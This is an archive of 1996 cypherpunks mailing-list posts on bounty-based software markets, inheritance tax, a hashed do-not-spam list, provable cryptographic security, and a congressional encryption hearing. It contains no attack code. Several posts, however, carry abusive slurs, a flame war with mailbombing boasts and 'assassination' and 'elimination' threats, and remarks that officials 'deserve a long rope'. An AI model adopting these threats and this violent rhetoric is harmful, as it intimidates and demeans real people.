>     must be Copylefted. I decided that that wasn't really necessary, but 
>     rather simply desired. To aid in that desire, I am going to build in 
>     an initative to releaseing the software "copylefted".

Absolutely - let the market decide.  Some of us, for example, do not like
copyleft.

> To get more specific: 
  [chop]
>     The first developer to upload a _working_ package to the server will 
>     be awarded the total bounty, ...

This worries me.  If I, as a junior programmer, am looking to enter the
market, I will have the daunting task of beating everyone else.  Real life
doesn't work that way - there are ways in which I can pick up some newbie
tasks for low money, so as to build up experience and/or reputation.

I guess the notion of bounty is just that - first one takes all.
However, I think that the solution might be a bit limited in the
long run.

Interesting in that my proposal leads to task distribution by awarding
contracts, your proposal leads to task incentives by rewarding speed.

>     "First" will be soley determined by the time stamp of the server. As soon
>     as the package is uploaded, the initiator and the server adminstrator 
>     will be notifed, and the bounty marked "claimed". If the package is 
>     accepted by the initiator, the bounty will be marked "closed", the 
>     package moved to an FTP site for distribution (if Copylefted) or 
>     moved offline if not (archived copies will be kept for legal reasons--
>     more on that later). At that point a check for the developer will 
>     be cut (or ecash mailed if that works out).   

OK, my proposals specifically assume no need for a "decision" by Alice.
That's not to say either is right, it's just that I prefer to design
something that eliminates the individual decision rather than cope
with the complexities.  I believe it will result, in the end, in a
more efficient market.

>     The Server Adminstrator will also do an cursory check to make sure that
>     there are no obvious copyright violations. 
> 
>     In the event that there is a conflict between the initiator and the 
>     developer, the claim will go into adjudication. The server adminstrators
>     decesion is final, and he will make every effort to settle the claim
>     fairly. Adjudication will incur an additional fee (see the fees section). 

Same as above, no adjudication in my system.
Although, it is possible to add underwriters,
by simply making the task offerers (Bob and Carol)
into bond writers who front for programmers.

> Status:
> 
>     At this point in time I am (obviously) still in the process of developing 
>     the procedures. I have registered a Domain Name (bounty.org) and I have 
>     a couple promises off assistance in certain areas. As well, I have 
>     a server to start off with.  

Wow, *gotta* move fast.  As I say, our stuff is based on a lot of
pre-existing software, so we make a lot of assumptions.  Given our
different approaches we may end up with competing systems rather
than one, but that's fine, indeed highly valuable as an experimental
approach.

What's financing you in this?  Or should I say, monetarily enthusing?

I have started writing (last night :)) this all up as a paper for
presentation to FC97.  If you want, we could collaborate, or I will
just document your efforts, and concentrate on presenting mine.

My efforts are now at
    http://www.systemics.com/docs/papers/task_market.html

TTFN
iang.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 26 Nov 1996 17:37:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: TIA Invites
Message-ID: <1.5.4.32.19961127013503.0067151c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


A rep of the Telecommunications Industry Association
telephoned to say that TIA has invited authority to 
investigate disclosure of TIA's TR45.3 to the unworthy.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Boursy <boursy@earthlink.net>
Date: Tue, 26 Nov 1996 18:05:14 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: wealth and property rights
In-Reply-To: <Pine.LNX.3.95.961126110818.4290A-100000@deimos.ceddec.com>
Message-ID: <329BA29F.B97@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Tom Zerucha wrote:
> 
> Some basic points on the thread
> 
>1. For wealth to be "handed down", it must be earned or confiscated first.
>Mao's widow lived quite well during Mao's life and for a while after his
>death.  

  Well China is nor more of an example of communism than Argentina
is of Capitalism--they are both totalitarim regimes that use ideology
as an excuse to plunder.  It would be unfair for example to use
Marcos wife (and her shoe collection) as an example of why 
capitalism doesn't work.


> Also, if there was no direct way to pass wealth on to offspring,
> it would be consumed or destroyed by the generation which created it.  

  Perhaps by some--not most.  Many die without wills--the wealthy
tend to be much more careful with such things of course but you could
allow provisions to have a percentage donated to non-political chartible 
organizations.


> You may not agree with the choice of the original Kennedys and 
> Rockefellers, but limiting that choice is not without consequence 
> - the wealth will still not end up where you want it, and a great 
> amount will be left uncreated.

  I sincerely don't believe that.  If you look at your above
examples, or Bill Gates below, much of their motivation is not
the accumulation of weath per se but rather power and performance.
I know I would do much the same job (not that I'm in the wealthy)
even if the salary were more or less--I enjoy it (I'm a programmer).
Same is true for education--much of the motivation is either 
intrinsic or status oriented and has little or nothing to do with
marketablity.

 
> 2. In a socialist society wealth is confiscated at gunpoint.  

  Not at all--no more or less so than in capatilistic societies.


> In a capitalist society, I have to provide something that you want 
> more than your wealth in order to obtain it.  

  That's true--as with all labor--but it is a matter of scale.  
Gates would do the same thing if you limited his income just
for the sake of power accumulation--he's got all the money
he could ever consume.  That's not his real motive.

 
> 3. If wealth isn't being transferred, it is most likely because Government
> has created a monopoly or oligopoly.  If I have a better idea for a car, I
> cannot simply just build one, since any modification to the powertrain has
> to be certified by the EPA.  So if I could get 2 Miles/gallon better
> mileage without a change in emissions for a $50 modification, I still have
> to spend over $1 Million satisfying the bureaucracy and generating no
> profit.  The existing auto industries have no incentive to change this
> because these are sunk costs, and they can keep their oligopoly.

  Yes-our auto industry is a disgrace and I agree we do no favors
protecting them or bailing them out.  On the other hand goverment 
must protect against the creation of business monopoly which is
even more stifling.

 
> 4. When you say wealth isn't being transferred, it is also generally
> untrue.  While someone may be controlling it, their control is usually not
> to leave it under a matress (which would make my wealth comparatively more


   Sorry to chop out so much about Microsoft--but sure most wealth is
transferred in this country--that's a statisitical fact.  Yes--there
is consumption but when accumalation gets into the multi-millions that
becomes irrelevant--money grows as you know--stocks, property, etc. and
that is all that is passed down.  There are few on either of these mailing
lists that if given 10 million dollars could not sit on their ass for
the rest of their lives consuming comfortably and watch their money double
by the time they pass away.

 
> 5. Government is the least efficient means of resolving the problem.  The

   As inefficeint as it is it is really the only effective means.  A
simple 100% inheritance tax would be very helpful as would limitations
on how much property a given individual (and a corporation is a virutal
individual) may own.

 
> 6. No one has given any reason why the dollar following the 10-millionth
> has less claim of ownership than the first 10-million.  You can dislike
> the situation, but I would like to hear a *consistent* theory of property
> rights that holds a sliding scale of claim based on volume.  Does the
> grocer with 200 tomatoes need to give away 20 because a store down the
> street has only 180?  What if the situation is reversed the next day?


  Well the original issue we were discussing was the fact that
a majority of wealth in the US in not earned--it is inherited.  That
can be changed very quickly with proper legislation.

  As to your other issue here--earnings and limitations on accumulation,
much would be equalized without inheritance.  But yes--there would
still be accumulators--most would still produce regardless of
limits because as I said their motives are not simply income--power,
prestige, etc. all come in to play as well as the gratification that
comes with winning.  Gates enjoys his cover on Time Mag. much more
than a few extra million a day.

  But the basic answer to your argument--from my standpoint--is that
some people are extremely intellegent, others very gifted in other
ways, others very dull witted, etc.  Some possess artistic genius
that can pay off immediately, others have none that is valued dollar
wise by society.  I sincerly don't believe one has the right to
live better than the other--that the rewards, if different, sould
be negligable.  

  If I could make as much as I do know programming by working as
a clerk in a convenience store or whatever I would still choose to
do what I am doing.  If you are in a different situation you're
in the wrong career.

                            Steve




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 26 Nov 1996 20:22:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Another Nutty Idea about SPAM
In-Reply-To: <199611260706.BAA07407@algebra>
Message-ID: <y791XD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:
> Another nutty idea: to create a database of people who do NOT want to
> receive unsolicited advertisements, and make it widely available.

This is not a nutty idea at all. It's a very good idea.

> The obvious problem is that some very uncsrupulous spammers would want
> to grab this database and use it as a source of email addresses.
>
> This problem has a solution, however: instead of distributing people's
> email addresses, distribute MD5 checksums of their addresses. For
> example, an entry for ichudov@algebra.com would be
>
> 	b51175dae78f25427351d5e3ff43de30
>
> There is no way to guess the original text from an MD5 checksum.

You misspelled SHA. :-)

> Spammers should be advised to exclude all addresses with MD5 checksums from
> that database from the recipient list, and include instructions on how
> to get one added to the database into their spams.
>
> Database maintainers could even provide a email filter-bot that would
> accept recipient lists by email and send back the same lists, but
> WITHOUT addresses that wish not to receive spam. This way stupid
> low-tech spammers (who make up the majority) will be able to process
> their email lists quickly and easily.
>
> This database may be maintained centrally. Users may be able to sign up
> for inclusion into that database by email or by filling out a Web-based
> form. Identity verifications may be done by using cookie protocol.

This was discussed on this mailing list around September. Check the
archives for good ideas how to add wildcards (like *@algebra.com) to
the hashed list.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 26 Nov 1996 13:58:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199611262152.WAA01587@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


oh mindless aga,

>> This betrays your ignorance.  I.Q. is scaled according to age.  One does
>> not "improve."

Certainly not in your case.
 
>
>I have no ignorance, except for being ignorant of stupid people
>who call themselves "punks."

If you are ignorant of them, then how do you know that they are "stupid"?

>Look asshole; it says "LAW DOCTOR" -- that is what "Juris Doctor"
>means, stupid.  And I am about to stick the motherfucking Laws
>right up your cocksucking ASS!

How is this possible? It seems that you are possible of rather contemptible contortions!


>"Juris" means Law.  So Juris Doctor means "Law Doctor."

Clinging to technicalities here, aren't we?

>that is irrelevant, and you are off-topic.

Oooh! Oooh! Point the finger here, aga, at YOURSELF!

>Europe is also irrelevant, and you keep missing the point here.
>You have added the cypherpunks list again, and that was forbidden.

What a wonderful statement: Europe is irrelevant!!! A truly educated mind here. 

>look asshole, you really want that list killed, do you not?
>I have no bounds, as you will soon learn.

When one is clapped in irons and thrown into prison for whatever it is that your acts can be classified under, then I am pretty sure they have _some_ bounds.

>> > > Be careful who you threaten.  It might get you in trouble.

One wonders if you ever pay attention to what you actually write, aga?

>WRONG!  There is NO crime which covers anything that one does
>internationally!   And mailbombing is NOT "Unauthorized access,"
>regardless of where it occurs!

Uhm...oops, aga, you're wrong here, there are plenty of crimes that are international crimes. War crimes for example, which o against the Geneva convention. Child abduction crimes, which go against the Hague convention. But I am sure they will give you a slight slap on the  wrist, after all, you are only a stupid hillbilly with no idea of the law.

>Pitt-1975; Dissertation was in 1983 actions.  I practiced for
>six years, and then became perfect.  I currently do not practice for
>any parties other than myself, family, corporation or Institutes,
>and I need no license for that. And since I do not carry any
>license from any State, there is NOTHING that you can do to stop me.

Assassination comes to mind...

>The State disciplinary board has no jurisdiction, nor does any
>Law.  A Criminal Lawyer is a specialist in ripping new assholes
>on the witness stand, and that must now also be practiced on the net,
>it seems.  Remember, you are the one who asked for this, "Sadam."

You seem to have this absolute _fascination_ with asses, faggots, cocks, and ripping _new_ assholes (as if you weren't a big enough one already. This is obviously some sort of concious repression: you just can't face the truth, can you, aga?

>This is a world-wide internet problem that you are about to get
>taken care of.  You will be among the first locations to be
>eliminated.  And just remember that your termination is your own
>doing.  You had your chance to keep the fucking cypherpunks list
>OFF of your e-mail to me, and blew it.

Do we run and hide now, mommy?

>> I suggest a hobby which entails more physical activity.
>> 
>
>I pump iron and run three times a week.  And as a Tae Kwon Do
>black belt holder, I get lots of physical activity. I am in
>better physical shape than any other man that you know.

He/she/it pumps iron, does he/she/it? Whilst running? No mean feat for a thing without a brain. Assuming that you are better than anyone else you have probably never met, someone who probably has no desire to meet a thing like yourself, is yet another example of your sheer assonance!

>And just understand, as far as the internet is concerned, Europe does
>not mean SHIT!

Of course not...I am sure the European Internet thinks the same as you. After all, an inanimate object seems to think just as much as you!


--The Edge







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The CNET newsletter <dispatch@cnet.com>
Date: Tue, 26 Nov 1996 23:22:46 -0800 (PST)
To: Multiple recipients of list NEWS-DISPATCH             <NEWS-DISPATCH@DISPATCH.CNET.COM>
Subject: CNET News Dispatch  November 26th, 1996
Message-ID: <199611270708.XAA06780@central.cnet.com>
MIME-Version: 1.0
Content-Type: text/plain


***************************************

NEWS.COM DAILY DISPATCH
6:10 p.m. (PT)
Tuesday, November 26, 1996
San Francisco, California, USA

***************************************

WELCOME!

***************************************

The NEWS.COM DAILY DISPATCH highlights the up-to-the minute technology news
presented by NEWS.COM. It tempts readers with coverage of today's hottest
stories, news in the making, (in)credible rumors, and other indispensable
information.

For complete versions of the stories updated all day long, head over to:

   http://www.news.com/?nd

***************************************

CONTENTS

SCOOPS AND TOP STORIES

        The legislation that launched thousands of cyberspace ribbons
        The Nostradamus of the semiconductor market speaketh!
        Comdex sucks! No, it rules! Sucks! Does not! Does so!
        Might that be the virogen.asexual virus in your software?

ANNOUNCEMENTS
     An easy way for you to customize NEWS.COM
     Late-breaking stories just a click away with Desk Top News
     Send us your questions, comments, flotsam, and jetsam

***************************************

SCOOPS AND TOP STORIES

THE LEGISLATION THAT LAUNCHED THOUSANDS OF CYBERSPACE RIBBONS
It's baaaack... The Supreme Court will decide tomorrow whether it should
review the CDA--the legislation cyberspace loves to hate--or simply put it
out to pasture. Swirling around inside this legal vortex are issues of free
speech, the definition of "obscene," and a potential $250,000 fine for
transgressors. Maybe CDA really stands for "Can't download anything..."

   http://www.news.com/News/Item/0%2C4%2C5743%2C00.html?nd

***************************************

THE NOSTRADAMUS OF THE SEMICONDUCTOR MARKET SPEAKETH!
Who better than a Robertson, Stephens semiconductor analyst to take you on a
guided tour of the volatile world of semiconductor stocks? Dan Niles
demystifies the market's plummeting and rising...distinguishes between
trends and blips, and pontificates on where semiconductor stocks are going
in the long run. [Hint: Can you say $275 billion?...]

   http://www.news.com/Perspectives/perspectives.html?ntb.pers?nd

***************************************

COMDEX SUCKS! NO, IT RULES! SUCKS! DOES NOT! DOES SO!
If you've been to Comdex and survived, how did you manage it? NEWS.COM wants
your war stories. We will publish the best five, and the winners--picked on
a totally subjective basis by our editorial staff--will get supercool CNET
T-shirts. Mail suggestions@news.com, and include the words 'Comdex stories'
in the subject of your message. To paraphrase the Prez, "Let us feel yur
paynnne..."

   http://www.news.com/Comdex/?nd

***************************************

MIGHT THAT BE THE VIROGEN.ASEXUAL VIRUS IN YOUR SOFTWARE?
Downloaders of PointCast's version 1.2 got a bit of a shock for their
trouble, namely a Norton antivirus software-generated message that told them
they had contracted a virus with the esoteric moniker "Virogen.asexual."
While the scare isn't in league with the benzene-in-the-Perrier snafu of a
few years back, there were still ruffled feathers that needed smoothing.

   http://www.news.com/News/Item/0%2C4%2C5745%2C00.html?nd

***************************************

ANNOUNCEMENTS

AN EASY WAY FOR YOU TO CUSTOMIZE NEWS.COM
So many bits, so little time? Sounds like you need Custom News. Identify the
topics, keywords, or sections you're most interested in, and Custom News
will a create a page of headlines and summaries for all stories that match
your criteria. Check it out at:

http://www.news.com/Personalization/Entry/1%2C21%2C%2C00.html?nocache=1

***************************************

LATE-BREAKING STORIES A CLICK AWAY WITH DESK TOP NEWS
How would you like having split-second access to the very latest news on the
Net? Our Desk Top News feature puts our 20 most recent stories right there
on your desktop for you to review at any time. Here's how it works:

1. From any story, click Desk Top News in the top right.
2. A window will open showing our last 20 stories.
3. Click on a headline to display the story.
4. Desk Top News updates itself every 30 minutes.
5. You become known as Ms./Mr. Cyber-Info. It feels good.

   http://www.news.com/Help/Item/0%2C24%2C12%2C00.html?nd

***************************************

SEND US QUESTIONS, COMMENTS, FLOTSAM, AND JETSAM
If you have any questions, suggestions or remarks, send us a message:

   newsdispatch@cnet.com

***************************************

CNET: The Computer Network
   http://www.cnet.com/
   http://www.news.com/
   http://www.gamecenter.com/
   http://www.download.com/
   http://www.search.com/
   http://www.shareware.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Tue, 26 Nov 1996 03:41:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Provably "Secure" Crypto (was: IPG Algorithm Broken!)
In-Reply-To: <Pine.LNX.3.94.961126020057.2424A-100000@random.sp.org>
Message-ID: <199611261141.AAA03817@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 26 Nov 1996 03:39:35 +0000 (GMT), The Deviant wrote:

   On Mon, 25 Nov 1996, Dana W. Albrecht wrote:

   > so often, I refer to systems for which rigorous mathematical proof that 
   > "there are no shortcuts" exists.  To my knowledge, no such systems, with 
   > the exception of a real one-time pad, exist today.  However, I also 

   As I have argued many times, that is correct.  OTP, with real random
   numbers, and no-reusage, etc, etc, is the only "perfect" cryptosystem, and
   even it has its problems (like key exchange, for instance).

The only one known at this time, not necessarily the only one
possible.  Are you aware of some proof that no other cryptosystem can
be secure (in the way Dana talks about)?

   > Rigorous proofs of the non-existence of an algorithm are not new.  
   > Neither are rigorous proofs that any algorithm which can solve a given 
   > problem requires a minimal running time.  Or, in an even stronger sense, 

   Hrmmm... I seem to see a problem (namely Moore's first law) in assigning

There's a Moore's second law?

   anything a "minimal running time".  Perhaps "minimal instruction count"
   would be more suited to your example.  Because if you're talking about
   time, it essentially boils down to "the longer something takes the less
   time it takes".

"Minimal running time" doesn't really mean time in hours.  Obviously
hardware gets faster all the time.  It means complexity -- O(n^2)
takes more time than O(log(n)), regardless of how fast your hardware
is.  In other words, if takes f(x) time units, but the units are
arbitrary.

"Minimal instruction count" is pretty meaningless (change the
instruction set to arrive at any figure you like).

   > that a particular known algorithm for a given problem is indeed a 
   > (provably) optimal algorithm for that problem.

   Never happen.  It just won't.  As a rule, there's _always_ a faster way.

But there _are_ such proofs ("reductio ad absurdum".  Assume this is
_not_ the best algorithm.  Then there is some better algorithm.
Figure out some properties this better algorithm must have.  Something
like "1 == 2" comes up, therefore there is no such better algorithm.)

Of course you can do it (whatever "it" is) faster with faster
hardware, or maybe better implementation.  And there are sometimes
special-case shortcuts...(a OTP has innumerable "weak keys" -- all
'0's being the most obvious -- of course it's _possible_ that your
random pad just happens to transform your real message into valid
English text, but I doubt this argument would save you from the firing
squad :-) The chance of generating an all-'0' pad ((1/n)^x, n=range of
values in pad, x=number of blocks (characters) in message) is a lot
better than the chance of getting some unrelated-but-meaningful text
as output (I don't even know where start on that one -- it's the
"monkeys in the British Museum" scenario))

   > Turning once again to cryptography, there is presumably an "optimal" 
   > algorithm for factoring a "general" number in the "worst" case.  Of 

   Ok, now I have to pose a question: If cryptographers actually beleive
   this, why continue to search for a faster one.

Because no-one's found the optimal solution yet (or at least not
proved that it is optimal).

   > "optimal" algorithm.  Worse case bounds on running time for currently 
   > known algorithms can certainly be produced, but no one currently knows 
   > if these are the best algorithms.

   Again I say, there's _always_ a faster way.

But you're arguing "faster" in terms of clock time (which is obviously
true, but not necessarily useful).  Something that takes O(n^2) time
can be done in arbitrarily short clock time (given fast enough
hardware), but is still slower than something that takes O(log(n))
time.  If you make n big enough, the O(n^2) calculation may not be
worth doing, while the O(log(n)) calculation is still fairly fast (in
reality, of course, you'd prefer something that takes much longer than
n^2).

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
Christ:
	A man who was born at least 5,000 years ahead of his time.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kathleen M. Ellis" <tgkelli@tiger.towson.edu>
Date: Tue, 26 Nov 1996 23:19:13 -0800 (PST)
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Today's hearing (Re: Dorthy Denning is a boot-licking fasicist!!!)
In-Reply-To: <199611262215.QAA21070@mailhub.amaranth.com>
Message-ID: <Pine.SGI.3.93.961127020934.1567B-100000@tiger.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 26 Nov 1996, William H. Geiger III wrote:

> Hi,
> 
> I don't know if anyone watched the House Subcomitty on Computers &
> Technology today on C-Span.

I was there today in DC at the hearing.  

> Dorthy Denning gave the most pro-government speech I have ever heard. Is
> this clueless bitch on the government payroll?!!
> William Reinsch is a lying bastard. Fucking politions!! Fucking
> goverment!! They all deserve a long rope!!

Settle down.  Neither of them was _that_ bad... just business as usual.
My favorite Denning remark though, was when PRZ brought up the fact taht
the FBI's latest legislative goal had been to obtain the
capability/permission to wiretap 1% of the population, and she tried to
refute it.  (It was later brought up by an audience member from the ACLU
that Louis Freeh's remarks to those effect were in the congressional
record).

Reinsch's shining moments came when he became so worn down by the
opposition that he made the "look, it was Clinton's order.  He's my boss,
so i just have to do what he says" type of response.

> Phil Zimmerman was quite good at attacking the government policies.

Dan Geer, of Open Market, and (umm...somebody) of Open Vision systems also
did very well.

> <sigh> We are truly a country of fools to have put these jackbooted
> facisit bastards back into office.

Neither Denning nor Reinsch is an elected official.  Any president we
elect, unless they run with a specific pro-crypto plank in their platform
will do the same thing...they're all in bed with the LEA's.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
The Semi-Carless Kathleen Ellis    NEW ADDRESS: tgkelli@tiger.towson.edu
I hate the web.			       http://tiger.towson.edu/~tgkelli/
I love encryption.    1996/08/30 Kathleen Ellis <kelli@tiger.towson.edu> 
pub  2047/21853015     F8 D6 96 B2 C6 5A 08 15  43 BE 9E CF 18 8F 1B F0

"Someone tried to get me to run nachos on my box once.  Said it was better
than sunos, more cheese".
						-r4j00g4





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Tue, 26 Nov 1996 20:17:19 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Another Nutty Idea about SPAM
In-Reply-To: <199611270037.SAA11474@algebra>
Message-ID: <199611270417.VAA15665@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199611270037.SAA11474@algebra>, on 11/26/96 
   at 06:37 PM, ichudov@algebra.com (Igor Chudov @ home) said:

::Omegaman wrote:
::> Igor Chudov wrote:

::> 
::> Okay fine.  The spammer is "advised" but if he is unscrupulous in the 
::> first place, he'll simply ignore the advice and continue bulk-mailing 
::> to every address he can grab.  

::In which case the spam-fighting mob will harass him.
                                          ^^^^^^^^
        strange choice of words, when I first read it,
    my mind read _harvest_.


::> > Database maintainers could even provide a email filter-bot that would
::> > accept recipient lists by email and send back the same lists, but
::> > WITHOUT addresses that wish not to receive spam. This way stupid
::> > low-tech spammers (who make up the majority) will be able to process
::> > their email lists quickly and easily.
::> 
::> Indeed, stupid low-tech spammers would benefit from such a service if 
::> they wish to honor "do not send" requests.
::>  
        well, I've always figured that people are basically OK 
    until proven otherwise --or their is money involved. 
        then there are lawyers....

--
  maybe there is an analogy:

  militias:   "the only way they'll take my weapon
              is from my cooling, smoking hand...."

  bubba:      "the only way they'll take my executive privileges
              is to impeach me --IF I consent to leave."

            <attila>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Tue, 26 Nov 1996 21:18:52 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Dorthy Denning is a boot-licking fasicist!!!
In-Reply-To: <199611262215.QAA21070@mailhub.amaranth.com>
Message-ID: <199611270518.WAA17658@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199611262215.QAA21070@mailhub.amaranth.com>, on 11/26/96 
   at 03:38 PM, "William H. Geiger III" <whgiii@amaranth.com> said:

[snip]

-----BEGIN PGP SIGNED MESSAGE-----


- ----------------------------------------------------------------------

::Dorthy Denning gave the most pro-government speech I have ever heard. Is
::this clueless bitch on the government payroll?!!
::
        that she is, most assuredly, but you'll never prove it.

::William Reinsch is a lying bastard. Fucking politions!! Fucking
::goverment!! They all deserve a long rope!!
::

::Phil Zimmerman was quite good at attacking the government policies.
::

::<sigh> We are truly a country of fools to have put these jackbooted
::facisit bastards back into office.
::
        is there a different kind that we are permitted to elect?

        I always thought our truth reporting news media, despite their
    control by big money gave us choices, like

            a republican who has the socialist instincts of FDR, or

            a hill-billy pseudo leftist who sounds like he expects his
            subjects to believe he is a "centrist" or

            Harry Brown, a "republican" in sheep's clothing who just
            wants to give the states the federales' right to declare
            justice at our expense.  Harry received less than 300,000
            votes this time --35% of what the last candidate --guess
            ol Harry was the only one who did not fool the people, or

            big ears and deep pockets... not bad. all that money bought
            8% of the disaffected vote.

        the only _constitutionalist_ running for President was Howard
    Phillips.  I might have voted for the first time in my life if he
    had been on the ballot in Utah.

        some democracy, an assemblage of whores.
            unfortunately, we are the whores
        
                    sorry O'Rourk, for masticating your quote.

        australia was settle by English prisoners, mostly bankrupts and
    the like. after the original religious settlers, America was settled
    by every bounder who dream of piracy and the liberty to rape, 
    pillage and burn.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMpvOgr04kQrCC2kFAQE9hQP/SwBElDVDaFOweLChe3vCfIBooDY4TtDJ
oKwDmIYotUvH6a/x5hxJEBJiQB/8h3FGZwtXuxaH6NFN4uzl/QcVsASaGuStIt98
NG/RvemzKYUblgMcTIyAwCnEyCoclG1ve/9XeCggojsnu6CgWhPTP9Ov2snWDc+4
u0wd2UH78CY=
=oSac
-----END PGP SIGNATURE-----


--
  Cyberspace is OUR Freedom.  
    FUCK your CDA!
        -attila

--
  Cyberspace and Information are Freedom!  
    FUCK your WIPO, too. 
        -attila

--
  maybe there is an analogy:

  militias:   "the only way they'll take my weapon
              is from my cooling, smoking hand...."

  prez:       "the only way they'll take my executive privileges
              is to impeach me --IF I consent to leave."

            <attila>
--
  without arms they do not resist; 
    without communication they know not what to resist.
        -attila
--
  one of the few conclusions shared by the enlightened: 
    the absolute, corrosive contempt for our elected officials.
        -attila
--
  Politicians are like diapers.
    They both need prompt and regular replacement, 
    and for the same reason.
        -attila
--
 "In nature, stupidity gets you killed.
   In the workplace, it gets you promoted.
    In politics, it gets you re-elected."
        --attila

--
 "Every government is an assemblage of whores.
   Unfortunately, in a democracy, we are the whores."
        --O'Rourke






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Wed, 27 Nov 1996 05:57:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199611271348.FAA32168@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have any experience with this product she/he would like to share? This is the Win95 model.

:Stealth Encryptor

:Stealth Encryptor offers the following functions: 

:    Stealth Encryptor, List Mode 
:    Stealth Encryptor, Browser Mode 
:    Important Files Backup with auto encryption 
:    File Shredder 
:    E-Mail Encryptor 
:    Drag and Drop support 
:    Dockable Toolbar 
:    Stealth Media Encryption, super speed for large image, multimedia and exe files 
:   DES encryption 
:    32 bit performance, compatible with Windows 95 and Windows NT 

:http://www.tropsoft.com/stealth

Many thanks.

A c'punks survivor (so far)!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 29 Nov 1996 05:33:30 -0800 (PST)
To: whgiii@amaranth.com
Subject: under 80 chars to a line PLEASE!
In-Reply-To: <199611282045.OAA12565@mailhub.amaranth.com>
Message-ID: <199611270629.GAA00259@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



William Geiger <whgiii@amaranth.com> writes:
> Dimitri Vulis <dlv@bwalk.dm.com> writes:
> >Surely someone who can't learn to format their text to 80 columns
> >(perhaps because he uses a dead operating system) has no credibility when
> >he speaks of technical things he clearly knows nothing about.
> 
> Are you incapable of turning on the word-wrap on your editor??

You may not get along with Dimitri, but in this case you are clearly
in the wrong.  If you consult any newbie FAQs for USENET, mailing
lists, netiquette, etc. you should notice that lines less than 80
chars long are recommended.

People who insist on splurging 120 char. long lines are usually poorly
read.  It just looks so disgusting as to be near unreadable on the
majority of newsreading software.  With the volume of this list, and
the fact that the cluefull actually do produce < 80 long lines, I'm
sure many just don't have the patience to read such stuff.

Retorts about how the reader should ajust their software to your
non-compliance to the accepted standards is just ridiculous.

I've also got a beef with people who produce mime encoded junk.
Things where all lines end in `=', and punctuation characters are mime
encoded.  Yuck!  Turn it off!

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 27 Nov 1996 04:16:47 -0800 (PST)
To: tgkelli@tiger.towson.edu (Kathleen M. Ellis)
Subject: Re: Today's hearing (Re: Dorthy Denning is a boot-licking fasicist!!!)
In-Reply-To: <Pine.SGI.3.93.961127020934.1567B-100000@tiger.towson.edu>
Message-ID: <199611271234.GAA03465@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> On Tue, 26 Nov 1996, William H. Geiger III wrote:
> > Dorthy Denning gave the most pro-government speech I have ever heard. Is
> > this clueless bitch on the government payroll?!!
> > William Reinsch is a lying bastard. Fucking politions!! Fucking
> > goverment!! They all deserve a long rope!!
> Settle down.  Neither of them was _that_ bad... just business as usual.

     Business as usual is _that_ bad.

> > <sigh> We are truly a country of fools to have put these jackbooted
> > facisit bastards back into office.
> 
> Neither Denning nor Reinsch is an elected official.  Any president we
> elect, unless they run with a specific pro-crypto plank in their platform
> will do the same thing...they're all in bed with the LEA's.

     Well, it's been said before, you are know by the company you keep. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@gonzo.ben.algroup.co.uk>
